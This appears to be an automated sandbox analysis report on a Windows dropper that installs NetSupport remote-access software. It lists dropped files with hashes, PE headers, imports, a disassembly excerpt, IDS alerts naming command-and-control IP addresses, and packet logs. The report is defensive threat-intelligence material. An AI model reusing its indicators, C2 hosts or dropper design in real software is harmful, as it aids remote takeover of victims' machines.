                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......g.V#...#...#...L...2...*.r.&...#...t...L.K.u...L.J.>...L.{."...L.|."...Rich#...........PE..L......^.....................J.......!............@.......................... ......9?....@....................................<.......T...............p@..............................................@...............@............................text.............................. ..`.rdata..,%.......&..................@..@.data....-..........................@....rsrc...T...........................@..@.reloc..p...........................@..B................................................................................................................................................................................................................................................................................................................................................
                                                      Process:C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe
                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):18944
                                                      Entropy (8bit):5.4541836410295055
                                                      Encrypted:false
                                                      SSDEEP:384:pYTd+1A0ELfG1rS9pjsj3CMC901pvW4vWaO:pG+eaA9pjwClIpDu
                                                      MD5:FD9AFC7DD89A1D07E0CB0F446AD6276F
                                                      SHA1:C62574724F42FEA392D787E0D43FD7C6EE0D29AF
                                                      SHA-256:23FDD21121E75766DB8CA077494C4E74F24EB38A19796739BD0CD39584AF2208
                                                      SHA-512:FD968E3E4771D0F5B80734D58A1DD858703CF0400607A03493423E8C84A0DC0A6FC687D4B5F526F257C6714955374BB96EFCF0DB0D7D95AF6A2A48A3D0B9E06A
                                                      Malicious:true
                                                      Antivirus:
                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..............Z...Z...Z.."Z...Z..[...Z..[...Z..[...Z...Z...Z..[...Z..[...Z..NZ...Z..[...ZRich...Z........................PE..L...I{~{...........!.....0..........@........@.......................................#....@A.........................?..4....P..,....p.. ...............................T............................................P......<<.......................text...4/.......0.................. ..`.data........@.......4..............@....idata..b....P.......6..............@..@.didat..`....`.......>..............@....rsrc... ....p.......@..............@..@.reloc...............F..............@..B........................................................................................................................................................................................................................................................................
                                                      Process:C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe
                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):15360
                                                      Entropy (8bit):5.677098248633158
                                                      Encrypted:false
                                                      SSDEEP:384:H3wSrclXZn246VWwmKlBKjijHL9h8vWL/W5O:/OXVi3jHLkw
                                                      MD5:3F3AFCDA1212C70FE1DB3DA109B59BE5
                                                      SHA1:E62D28FCC1775B7E26A18B0B5F193C1E6D4B945A
                                                      SHA-256:FEAAADFE81E72FF9E929893219948A0CD9209681D217B341C3ACCC39870B3491
                                                      SHA-512:1B542EC59D4E46D2A6DD78DD854027DE82C1F145BA69D4E1416AE37F49A038D61217C8F62403615FA54FD56FD9A585035B74C2BDF8DE0761880ABEDD71422EF7
                                                      Malicious:false
                                                      Antivirus:
                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............l...l...l...h...l...o...l...m...l...m...l...l...l...b...l.......l...n...l.Rich..l.........PE..L...).F............!.....*...........#.......@......................................J.....@A.........................8..?....P..<....`.......................p..P.......T............................................P...............................text...?).......*.................. ..`.data...`....@......................@....idata.......P.......0..............@..@.rsrc........`.......4..............@..@.reloc..P....p.......8..............@..B........................................................................................................................................................................................................................................................................................................................................
                                                      Process:C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe
                                                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):2048
                                                      Entropy (8bit):3.0070663606830066
                                                      Encrypted:false
                                                      SSDEEP:24:eH1GS+mCdVQM82IZW0HGbNuZbpa135WWdPPYPNy:yc8MFIZWUGhuZ9at5WwHg
                                                      MD5:55502E7D2D056327139999DD9F3E77B6
                                                      SHA1:B45C98C03830800181C67168FBCB44249EFC1D26
                                                      SHA-256:FAA0C0634EB64A22EA8587E82C5F6EBDDFF4DD773483DC3712073323D78A45AD
                                                      SHA-512:2BD0AAF627A08FEC1CD7F587C11E25CEC20CD4A166C94DBC5697C31083D79D3E443AA9E8755EB0AE9BC91620543CAA4E8EC1425B9DD8429712556CFF41B28A99
                                                      Malicious:false
                                                      Antivirus:
                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......5.<.q.R.q.R.q.R.e...p.R.e.P.p.R.Richq.R.................PE..L....J.............!.........................................................0............@.......................................... ..................................8............................................................................text...............................@..@.rsrc........ ......................@..@.....J..........T...8...8........J..........$...................8....rdata..8...x....rdata$zzzdbg.... ..`....rsrc$01....` .......rsrc$02.... ...........r..&..0.9Kz?.B..V.N.J..........................................................................................................................................................................................................................................................................................................................
                                                      Process:C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe
                                                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):10752
                                                      Entropy (8bit):4.907269785124234
                                                      Encrypted:false
                                                      SSDEEP:192:YlhOulH3yBNi+ckYazlA0rvh/CV1rZgWDdIaUWr:YlhOiyBNi+ckYavrvqZgWyvW
                                                      MD5:625DF63352C6610780AB954A69544B6A
                                                      SHA1:FD140F2E912367F0A53587A799ECE2BC01A920DE
                                                      SHA-256:D8ECEA519099F72843B0956C20C128B7948FF84311825DF4C9D8128B13584442
                                                      SHA-512:BDEA8F069C6AADEFD2902646AFB427CF19884255684B74F3EDBFA7204E45D281A530A1F4E5095B57B20624FCD7526730400B7C153EB90CC9AA3E897DFE974783
                                                      Malicious:false
                                                      Antivirus:
                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......Q.....~...~...~.......~...}...~...z...~.....8.~.......~...~...~...v...~.......~...|...~.Rich..~.........PE..L...Pls............!................0........0...............................p......l=....@A.........................#.......@.......P.......................`..........T............................................@...............................text............................... ..`.data...`....0......................@....idata.......@......................@..@.rsrc........P.......$..............@..@.reloc.......`.......(..............@..B................................................................................................................................................................................................................................................................................................................................
                                                      Process:C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe
                                                      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                      Category:dropped
                                                      Size (bytes):464977
                                                      Entropy (8bit):7.997745436579964
                                                      Encrypted:true
                                                      SSDEEP:12288:NlyAQnPyLZdddjqMiKuuK7WHAieWY90YxVr0BgaLSr4:NlyAQPyLZ5FvFHj60Ywp
                                                      MD5:849FFB0BB62A239066991E788BE7DDDC
                                                      SHA1:E875D54129B3A97ADFDA8AFC21B01A125A8CFB62
                                                      SHA-256:711F04FF06929EA36A69EAFB00B2C0EC18D0006587D54D87287DE25E34E3E8BA
                                                      SHA-512:210E1FF3280FC63FF635D295C6563C2246B5E9B2DD15DC44AAF5BFF5DBD62E146E221FB842360B446AF15C94A07FA5348E239DA9897E227578D0423FFA449B10
                                                      Malicious:false
                                                      Preview:PK..........6.......H.......nskbfltr.infU..j.0.......=...v*9.......a...r+.. ..}..i...AH..OZ.......9#.:%..l..{..*........]0d1.!*k..3B...b5....=9.A.)~........S..Xf....c..]eR...H#.u.{...<.....@..Z......b.-_.m.i...A...FG.rq.X..Q....&.5g..zV|..I6......PK........OW.V..#..R..8.......pcicapi.dll..XSI.(~R...D.EE...x.. ........".......B..c.u. .u]uu...`...v]W.X....?3'@P...{.{......g...;.m.3.A..1..aT..z.+....... Y.8`..5?...x.g.49..).H.......3...L..JNg...e.e$H.---..p\{0.|I.3.95}X.....F.........}.ET...7}8.......=.....3....../.x..],.@.....cLs.}......Aa...-..`....Dy2..`D{..c....?..^$..a.o.5!....oGaX...#aSM[.B.....d...e.c.=....d...K.gxG.d...g...9..o.c.2.e.q.8...1.#Hn.Ph\/G..;$..f"..ye.W.(....s.s.h....|2Ij..\G..d@.X.7p>.......sM.-\.`Fhf./...H...`)..v..cr/'...b..DW..?......n)L..Q.........)........_j......z.s...Ny... ...Iw.c...}(.......@...f93q=&7....c...(.pp...T....3.9'.F..(..@....hD4U9CU....Rh.ZU...^..@....S...)..5.B.u..4.k.'..&..j....!..h...0..V.....D.....2....d...
                                                      Process:C:\Users\user\AppData\Local\MSOneDrive\client32.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):16
                                                      Entropy (8bit):3.077819531114783
                                                      Encrypted:false
                                                      SSDEEP:3:llD:b
                                                      MD5:C40449C13038365A3E45AB4D7F3C2F3E
                                                      SHA1:CB0FC03A15D4DBCE7BA0A8C0A809D70F0BE6EB9B
                                                      SHA-256:1A6B256A325EEE54C2A97F82263A35A9EC9BA4AF5D85CC03E791471FC3348073
                                                      SHA-512:3F203E94B7668695F1B7A82BE01F43D082A8A5EB030FC296E0743027C78EAB96774AB8D3732AFE45A655585688FB9B60ED355AEE4A51A2379C545D9440DC974C
                                                      Malicious:false
                                                      Preview:40.7357,-74.1724
Process: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe
File Type: Zip archive data, at least v2.0 to extract, compression method=deflate
Category: dropped
Size (bytes): 1541147
Entropy (8bit): 7.996769493099852
Encrypted: true
SSDEEP: 24576:+T710QcNQDZDMUsCs+2tRqmwRVMMje5XTc13JYbU1uPLA+lvzG9Z0:aJ0QcNQDZDutRqLIVgJn1ujRlvzOZ0
MD5: CD84EC7208E1595BCF2789B6B4E8C3DA
SHA1: B657125B41CF35CC7F7AD17A3C7CB3935B4407DF
SHA-256: F5A1C380A403074A8A66CE97E2DAEDC5C930772810A5D70502AD40904BB32101
SHA-512: 3A6D71A98093DFB41A35AB968B13D2F728ABF732A1EC826436C41EBE0F6A6DFBDF6652B63928A3F9EF533EC27961DAB4F09035DA7A4A593E84B7A4CEC41A06A0
Malicious: false
Preview: (binary zip data, not shown; readable entry names in the preview: NSM.lic, PCICL32.DLL)
Process: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe
File Type: Zip archive data, at least v2.0 to extract, compression method=deflate
Category: dropped
Size (bytes): 81710
Entropy (8bit): 7.993374875389942
Encrypted: true
SSDEEP: 1536:QZ3ky6aDZbnUYbkKI0fGCplVgt0s+WpT4RhFccEyWI9UuTqFsYBGtpZx93:w3ky6aDZbbbACpl6t0s+WKhScEXI9Uul
MD5: E6ADABCEEAA1E96EB983291AC41812D3
SHA1: 139A8F2A679FFBCD313EB0C05B5DEB4B6B6622B0
SHA-256: 4812B9D2681BC7F1A47ECE99760066C1BBD40F3CB6E1331D04D448B4227DFE9F
SHA-512: 89A0124583A69613070AF16089B0E20B3683E2FE1EA6ADEF107D0987CBECE278AEF332432A8A2F4F5F409DB35C01CD0246D3A091849AD990D17A057061F066B5
Malicious: false
Preview: (binary zip data, not shown; readable entry name in the preview: WerEnc.dll)
Process: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe
File Type: Zip archive data, at least v2.0 to extract, compression method=deflate
Category: dropped
Size (bytes): 227999
Entropy (8bit): 7.9973837864428
Encrypted: true
SSDEEP: 6144:NPbV5TsiY8dBZcVZ3nmeXlxpiryWyxGZBk7KOI:NxYCBiPXmeX/piuLgSKOI
MD5: E80B9765381CE98E5004EE82FA515E14
SHA1: 008536F83B92FB794B8D325B243A0E00953E43B3
SHA-256: 87D5716606A50D61DC26C26C1A9F84E78D2A0772C9314BE9962F1778E056C405
SHA-512: B54BD712F42F9FC776CC7B807DAB686A2882FABBE3FD8D183B1F4C85CEF165CD0906C45239B7EE4AC3FA1BCD3B781F82064AA8BE36867620981387EAC4A45206
Malicious: false
Preview: (binary zip data, not shown; readable entry name in the preview: msvcp140_codecvt_ids.dll)
File type: PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit): 6.461600459380226
TrID:
• Win32 Executable (generic) a (10002005/4) 99.96%
• Generic Win/DOS Executable (2004/3) 0.02%
• DOS Executable Generic (2002/1) 0.02%
• Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name: SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe
File size: 140'800 bytes
MD5: aace5ed77f7d47cad3e45e0ccdc5411c
SHA1: cb9c403e8ba1a5531543d6c3b46250065b7f49c0
SHA256: a179d25f0ca4b9f6b7b1b7b4376664e422a6341650f80ba58626881638b64d50
SHA512: a73b05d441f2815db2cfdecb00e7df1574d510a28b73e15c365bd94ecb70cebc2ab624783a14874a64da27caa308d58c710ef8c09b96ebf36c04459dd7899874
SSDEEP: 3072:IAthOjYt6ktOt/nYUHal/5+LeLEsSkRqneaNn2qSzAuK2raS:dthOjYt6ktCYUHal/hwhkReeunZceS
TLSH: 81D36C16B9C0D133E8B71931197497B2AE3DFC301B545DCB63980A7A6F306D0AB35A6B
File Content Preview: MZ header followed by the DOS stub ("This program cannot be run in DOS mode") and a Rich header; binary content not shown
Icon Hash: 00928e8e8686b000
Entrypoint: 0x4073fa
Entrypoint Section: .text
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Time Stamp: 0x6561BDA3 [Sat Nov 25 09:25:55 2023 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 6
OS Version Minor: 0
File Version Major: 6
File Version Minor: 0
Subsystem Version Major: 6
Subsystem Version Minor: 0
Import Hash: 35ca174cb7a0dd69ac56ae5f0ce996e5
Instruction
call 00007FDE5C6BE204h
jmp 00007FDE5C6BDCBFh
jmp 00007FDE5C6C2F67h
push ebp
mov ebp, esp
push esi
push dword ptr [ebp+08h]
mov esi, ecx
call 00007FDE5C6BDE9Dh
mov dword ptr [esi], 0041921Ch
mov eax, esi
pop esi
pop ebp
retn 0004h
and dword ptr [ecx+04h], 00000000h
mov eax, ecx
and dword ptr [ecx+08h], 00000000h
mov dword ptr [ecx+04h], 00419224h
mov dword ptr [ecx], 0041921Ch
ret
push ebp
mov ebp, esp
push esi
push dword ptr [ebp+08h]
mov esi, ecx
call 00007FDE5C6BDE6Ah
mov dword ptr [esi], 00419238h
mov eax, esi
pop esi
pop ebp
retn 0004h
and dword ptr [ecx+04h], 00000000h
mov eax, ecx
and dword ptr [ecx+08h], 00000000h
mov dword ptr [ecx+04h], 00419240h
mov dword ptr [ecx], 00419238h
ret
push ebp
mov ebp, esp
push esi
mov esi, ecx
lea eax, dword ptr [esi+04h]
mov dword ptr [esi], 004191FCh
and dword ptr [eax], 00000000h
and dword ptr [eax+04h], 00000000h
push eax
mov eax, dword ptr [ebp+08h]
add eax, 04h
push eax
call 00007FDE5C6BF051h
pop ecx
pop ecx
mov eax, esi
pop esi
pop ebp
retn 0004h
lea eax, dword ptr [ecx+04h]
mov dword ptr [ecx], 004191FCh
push eax
call 00007FDE5C6BF09Ch
pop ecx
ret
push ebp
mov ebp, esp
push esi
mov esi, ecx
lea eax, dword ptr [esi+04h]
mov dword ptr [esi], 004191FCh
push eax
call 00007FDE5C6BF085h
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x20e7c | 0x8c | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x24000 | 0x1e0 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x25000 | 0x133c | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x20480 | 0x40 | .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x19000 | 0x19c | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x1767f | 0x17800 | d8130d75dfca9e2759c221e442aad28b | False | 0.5903631981382979 | data | 6.638540763857237 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x19000 | 0x87e6 | 0x8800 | 78cf3053082e55486bc34273cd165aea | False | 0.4685489430147059 | data | 5.058924359157263 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x22000 | 0x14a4 | 0xa00 | 56f89838282ee4d16f98ce00bea3f3c8 | False | 0.163671875 | data | 2.2329908576039887 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x24000 | 0x1e0 | 0x200 | e8f29e6669a480a4d72efeb174b889d9 | False | 0.52734375 | data | 4.7176788329467545 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x25000 | 0x133c | 0x1400 | c9d098ce7acb412e4277afe993baeb5c | False | 0.7755859375 | data | 6.476134917020887 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
.config | 0x27000 | 0x1000 | 0x200 | c16fdd55aae697949c5110df1dfd0f8b | False | 0.859375 | PGP Secret Sub-key - | 6.654871125593828 | IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_MANIFEST | 0x24060 | 0x17d | XML 1.0 document, ASCII text, with CRLF line terminators | English | United States | 0.5931758530183727
DLL | Import
WININET.dll | InternetReadFile, InternetCloseHandle, InternetOpenW, InternetOpenUrlW
SHELL32.dll | SHGetSpecialFolderPathW, ShellExecuteW, SHCreateDirectoryExW
SHLWAPI.dll | PathCombineW, PathFileExistsW
KERNEL32.dll | HeapSize, SetFilePointerEx, LCMapStringW, lstrlenA, lstrcmpA, HeapAlloc, GetProcessHeap, HeapFree, ExpandEnvironmentStringsW, SetFileAttributesW, Sleep, lstrcatW, lstrlenW, GetSystemDirectoryW, GetCurrentProcess, GetModuleFileNameW, FlushFileBuffers, GetLastError, HeapReAlloc, CloseHandle, ExitProcess, CreateProcessW, CreateDirectoryW, ReadFile, WriteFile, SetFileTime, SetFilePointer, CreateFileW, GetFileAttributesW, MultiByteToWideChar, LocalFileTimeToFileTime, GetCurrentDirectoryW, SystemTimeToFileTime, WideCharToMultiByte, GetConsoleOutputCP, GetConsoleMode, DecodePointer, CreateMutexW, GetSystemTimeAsFileTime, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TerminateProcess, IsProcessorFeaturePresent, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, WriteConsoleW, InitializeSListHead, IsDebuggerPresent, GetStartupInfoW, GetModuleHandleW, RtlUnwind, RaiseException, SetLastError, EncodePointer, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, FreeLibrary, GetProcAddress, LoadLibraryExW, GetStdHandle, GetModuleHandleExW, GetFileType, FindClose, FindFirstFileExW, FindNextFileW, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, GetCommandLineA, GetCommandLineW, GetEnvironmentStringsW, FreeEnvironmentStringsW, SetStdHandle, GetStringTypeW
USER32.dll | wsprintfW
ADVAPI32.dll | GetTokenInformation, RegCloseKey, RegSetValueExW, RegOpenKeyW, OpenProcessToken
Language of compilation system | Country where language is spoken
English | United States
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-09-21T14:45:24.705430+0200 | 2827745 | ETPRO MALWARE NetSupport RAT CnC Activity | 1 | 192.168.2.7 | 49704 | 37.1.209.225 | 443 | TCP
2024-09-21T14:45:24.705430+0200 | 2827745 | ETPRO MALWARE NetSupport RAT CnC Activity | 1 | 192.168.2.7 | 63016 | 37.1.209.225 | 443 | TCP
2024-09-21T14:45:24.705430+0200 | 2827745 | ETPRO MALWARE NetSupport RAT CnC Activity | 1 | 192.168.2.7 | 63020 | 37.1.209.225 | 443 | TCP
2024-09-21T14:45:24.705430+0200 | 2827745 | ETPRO MALWARE NetSupport RAT CnC Activity | 1 | 192.168.2.7 | 63019 | 37.1.209.225 | 443 | TCP
2024-09-21T14:45:24.705430+0200 | 2827745 | ETPRO MALWARE NetSupport RAT CnC Activity | 1 | 192.168.2.7 | 63018 | 37.1.209.225 | 443 | TCP
2024-09-21T14:45:24.705430+0200 | 2827745 | ETPRO MALWARE NetSupport RAT CnC Activity | 1 | 192.168.2.7 | 63021 | 37.1.209.225 | 443 | TCP
2024-09-21T14:45:24.705430+0200 | 2827745 | ETPRO MALWARE NetSupport RAT CnC Activity | 1 | 192.168.2.7 | 63017 | 37.1.209.225 | 443 | TCP
2024-09-21T14:45:31.650706+0200 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.7 | 49700 | 142.11.212.184 | 443 | TCP
2024-09-21T14:45:36.119849+0200 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.7 | 49701 | 142.11.212.184 | 443 | TCP
2024-09-21T14:45:37.285896+0200 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.7 | 49702 | 142.11.212.184 | 443 | TCP
2024-09-21T14:45:38.537220+0200 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.7 | 49703 | 142.11.212.184 | 443 | TCP
                                                      Sep 21, 2024 14:45:32.017741919 CEST44349700142.11.212.184192.168.2.7
                                                      Sep 21, 2024 14:45:32.017795086 CEST49700443192.168.2.7142.11.212.184
                                                      Sep 21, 2024 14:45:32.017894983 CEST44349700142.11.212.184192.168.2.7
                                                      Sep 21, 2024 14:45:32.017945051 CEST49700443192.168.2.7142.11.212.184
                                                      Sep 21, 2024 14:45:32.048338890 CEST44349700142.11.212.184192.168.2.7
                                                      Sep 21, 2024 14:45:32.048412085 CEST49700443192.168.2.7142.11.212.184
                                                      Sep 21, 2024 14:45:32.048614979 CEST44349700142.11.212.184192.168.2.7
                                                      Sep 21, 2024 14:45:32.048667908 CEST49700443192.168.2.7142.11.212.184
                                                      Sep 21, 2024 14:45:32.048957109 CEST44349700142.11.212.184192.168.2.7
                                                      Sep 21, 2024 14:45:32.049025059 CEST49700443192.168.2.7142.11.212.184
                                                      Sep 21, 2024 14:45:32.049437046 CEST44349700142.11.212.184192.168.2.7
                                                      Sep 21, 2024 14:45:32.049499035 CEST49700443192.168.2.7142.11.212.184
                                                      Sep 21, 2024 14:45:32.049663067 CEST44349700142.11.212.184192.168.2.7
                                                      Sep 21, 2024 14:45:32.049736023 CEST49700443192.168.2.7142.11.212.184
                                                      Sep 21, 2024 14:45:32.050136089 CEST44349700142.11.212.184192.168.2.7
                                                      Sep 21, 2024 14:45:32.050195932 CEST49700443192.168.2.7142.11.212.184
                                                      Sep 21, 2024 14:45:32.104023933 CEST44349700142.11.212.184192.168.2.7
                                                      Sep 21, 2024 14:45:32.104063988 CEST44349700142.11.212.184192.168.2.7
                                                      Sep 21, 2024 14:45:32.104096889 CEST49700443192.168.2.7142.11.212.184
                                                      Sep 21, 2024 14:45:32.104113102 CEST44349700142.11.212.184192.168.2.7
                                                      Sep 21, 2024 14:45:32.104156017 CEST49700443192.168.2.7142.11.212.184
                                                      Sep 21, 2024 14:45:32.104262114 CEST44349700142.11.212.184192.168.2.7
                                                      Sep 21, 2024 14:45:32.104296923 CEST44349700142.11.212.184192.168.2.7
                                                      Sep 21, 2024 14:45:32.104310036 CEST49700443192.168.2.7142.11.212.184
                                                      Sep 21, 2024 14:45:32.104315042 CEST44349700142.11.212.184192.168.2.7
                                                      Sep 21, 2024 14:45:32.104338884 CEST49700443192.168.2.7142.11.212.184
                                                      Sep 21, 2024 14:45:32.104356050 CEST49700443192.168.2.7142.11.212.184
                                                      Sep 21, 2024 14:45:32.104871988 CEST44349700142.11.212.184192.168.2.7
                                                      Sep 21, 2024 14:45:32.104950905 CEST49700443192.168.2.7142.11.212.184
                                                      Sep 21, 2024 14:45:32.105458975 CEST44349700142.11.212.184192.168.2.7
                                                      Sep 21, 2024 14:45:32.105515003 CEST44349700142.11.212.184192.168.2.7
                                                      Sep 21, 2024 14:45:32.105519056 CEST49700443192.168.2.7142.11.212.184
                                                      Sep 21, 2024 14:45:32.105526924 CEST44349700142.11.212.184192.168.2.7
                                                      Sep 21, 2024 14:45:32.105557919 CEST44349700142.11.212.184192.168.2.7
                                                      Sep 21, 2024 14:45:32.105561972 CEST49700443192.168.2.7142.11.212.184
                                                      Sep 21, 2024 14:45:32.105588913 CEST49700443192.168.2.7142.11.212.184
                                                      Sep 21, 2024 14:45:32.105593920 CEST44349700142.11.212.184192.168.2.7
                                                      Sep 21, 2024 14:45:32.105622053 CEST49700443192.168.2.7142.11.212.184
                                                      Sep 21, 2024 14:45:32.105645895 CEST49700443192.168.2.7142.11.212.184
                                                      Sep 21, 2024 14:45:32.106424093 CEST44349700142.11.212.184192.168.2.7
                                                      Sep 21, 2024 14:45:32.106468916 CEST44349700142.11.212.184192.168.2.7
                                                      Sep 21, 2024 14:45:32.106471062 CEST49700443192.168.2.7142.11.212.184
                                                      Sep 21, 2024 14:45:32.106479883 CEST44349700142.11.212.184192.168.2.7
                                                      Sep 21, 2024 14:45:32.106506109 CEST49700443192.168.2.7142.11.212.184
                                                      Sep 21, 2024 14:45:32.106522083 CEST49700443192.168.2.7142.11.212.184
                                                      Sep 21, 2024 14:45:32.140794039 CEST44349700142.11.212.184192.168.2.7
                                                      Sep 21, 2024 14:45:32.140904903 CEST49700443192.168.2.7142.11.212.184
                                                      Sep 21, 2024 14:45:32.140965939 CEST44349700142.11.212.184192.168.2.7
                                                      Sep 21, 2024 14:45:32.141014099 CEST49700443192.168.2.7142.11.212.184
                                                      Sep 21, 2024 14:45:32.141341925 CEST44349700142.11.212.184192.168.2.7
                                                      Sep 21, 2024 14:45:32.141388893 CEST49700443192.168.2.7142.11.212.184
                                                      Sep 21, 2024 14:45:32.141913891 CEST44349700142.11.212.184192.168.2.7
                                                      Sep 21, 2024 14:45:32.141961098 CEST49700443192.168.2.7142.11.212.184
                                                      Sep 21, 2024 14:45:32.141968966 CEST44349700142.11.212.184192.168.2.7
                                                      Sep 21, 2024 14:45:32.141999960 CEST44349700142.11.212.184192.168.2.7
                                                      Sep 21, 2024 14:45:32.142014027 CEST49700443192.168.2.7142.11.212.184
                                                      Sep 21, 2024 14:45:32.142024040 CEST44349700142.11.212.184192.168.2.7
                                                      Sep 21, 2024 14:45:32.142070055 CEST49700443192.168.2.7142.11.212.184
                                                      Sep 21, 2024 14:45:32.142070055 CEST49700443192.168.2.7142.11.212.184
                                                      Sep 21, 2024 14:45:32.194297075 CEST44349700142.11.212.184192.168.2.7
                                                      Sep 21, 2024 14:45:32.194356918 CEST49700443192.168.2.7142.11.212.184
                                                      Sep 21, 2024 14:45:32.194392920 CEST44349700142.11.212.184192.168.2.7
                                                      Sep 21, 2024 14:45:32.194437981 CEST49700443192.168.2.7142.11.212.184
                                                      Sep 21, 2024 14:45:32.194863081 CEST44349700142.11.212.184192.168.2.7
                                                      Sep 21, 2024 14:45:32.194924116 CEST49700443192.168.2.7142.11.212.184
                                                      Sep 21, 2024 14:45:32.195234060 CEST44349700142.11.212.184192.168.2.7
                                                      Sep 21, 2024 14:45:32.195286989 CEST49700443192.168.2.7142.11.212.184
                                                      Sep 21, 2024 14:45:32.195564032 CEST44349700142.11.212.184192.168.2.7
                                                      Sep 21, 2024 14:45:32.195612907 CEST49700443192.168.2.7142.11.212.184
                                                      Sep 21, 2024 14:45:32.195672035 CEST44349700142.11.212.184192.168.2.7
                                                      Sep 21, 2024 14:45:32.195715904 CEST49700443192.168.2.7142.11.212.184
                                                      Sep 21, 2024 14:45:32.196237087 CEST44349700142.11.212.184192.168.2.7
                                                      Sep 21, 2024 14:45:32.196288109 CEST49700443192.168.2.7142.11.212.184
                                                      Sep 21, 2024 14:45:32.196288109 CEST44349700142.11.212.184192.168.2.7
                                                      Sep 21, 2024 14:45:32.196304083 CEST44349700142.11.212.184192.168.2.7
                                                      Sep 21, 2024 14:45:32.196330070 CEST49700443192.168.2.7142.11.212.184
                                                      Sep 21, 2024 14:45:32.196347952 CEST49700443192.168.2.7142.11.212.184
                                                      Sep 21, 2024 14:45:32.197293997 CEST44349700142.11.212.184192.168.2.7
                                                      Sep 21, 2024 14:45:32.197343111 CEST44349700142.11.212.184192.168.2.7
                                                      Sep 21, 2024 14:45:32.197348118 CEST49700443192.168.2.7142.11.212.184
                                                      Sep 21, 2024 14:45:32.197355986 CEST44349700142.11.212.184192.168.2.7
                                                      Sep 21, 2024 14:45:32.197401047 CEST49700443192.168.2.7142.11.212.184
                                                      Sep 21, 2024 14:45:32.197650909 CEST44349700142.11.212.184192.168.2.7
                                                      Sep 21, 2024 14:45:32.197793961 CEST49700443192.168.2.7142.11.212.184
